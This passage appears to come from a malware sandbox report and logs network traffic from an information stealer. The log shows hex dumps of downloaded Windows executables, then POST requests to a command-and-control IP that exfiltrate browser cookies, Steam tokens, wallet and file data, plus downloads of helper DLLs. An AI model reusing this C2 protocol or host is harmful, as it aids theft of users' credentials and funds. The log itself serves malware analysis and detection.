00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 08 Dec 2024 12:32:03 GMTContent-Type: application/octet-streamContent-Length: 3191808Last-Modified: Sun, 08 Dec 2024 12:23:11 GMTConnection: keep-aliveETag: "67558faf-30b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 c0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 30 00 00 04 00 00 cd c7 30 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc a6 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac a6 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 6b 79 7a 6c 63 6f 79 00 00 2a 00 00 b0 06 00 00 f8 29 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 6a 6c 6d 71 75 66 76 00 10 00 00 00 b0 30 00 00 04 00 00 00 8e 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 30 00 00 22 00 00 00 92 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 08 Dec 2024 12:33:10 GMTContent-Type: application/octet-streamContent-Length: 1883648Last-Modified: Sun, 08 Dec 2024 12:22:56 GMTConnection: keep-aliveETag: "67558fa0-1cbe00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 80 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4a 00 00 04 00 00 fb 1c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 32 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 40 05 00 00 02 00 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 64 7a 79 72 69 68 75 00 50 1a 00 00 20 30 00 00 4e 1a 00 00 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6b 6a 69 74 73 73 6c 00 10 00 00 00 70 4a 00 00 04 00 00 00 98 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 4a 00 00 22 00 00 00 9c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 44 31 30 36 32 30 32 45 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="hwid"A2D106202E0F807656615------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="build"stok------AFBFHDBKJEGHJJJKFIIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 2d 2d 0d 0a Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="message"browsers------BKEBFHIJECFIDGDGCGHC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"plugins------AFHDAKJKFCFBGCBGDHCB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 2d 2d 0d 0a Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="message"fplugins------KEBGHCBAEGDHIDGCBAEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 185.215.113.206Content-Length: 7987Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 2d 2d 0d 0a Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------HJDGHIJDGCBAAAAAFIJD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJEGDAKEHJECAKEGDHJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 47 44 41 4b 45 48 4a 45 43 41 4b 45 47 44 48 4a 2d 2d 0d 0a Data Ascii: ------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIJEGDAKEHJECAKEGDHJContent-Disposition: form-data; name="file"------GIJEGDAKEHJECAKEGDHJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 2d 2d 0d 0a Data Ascii: ------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="file"------BAEBFIIECBGCBGDHCAFC--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDBHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDBHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="message"wallets------DBFBFBGDBKJJKFIEHJDB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAAHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 2d 2d 0d 0a Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="message"files------AEGIJKEHCAKFCAKFHDAA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 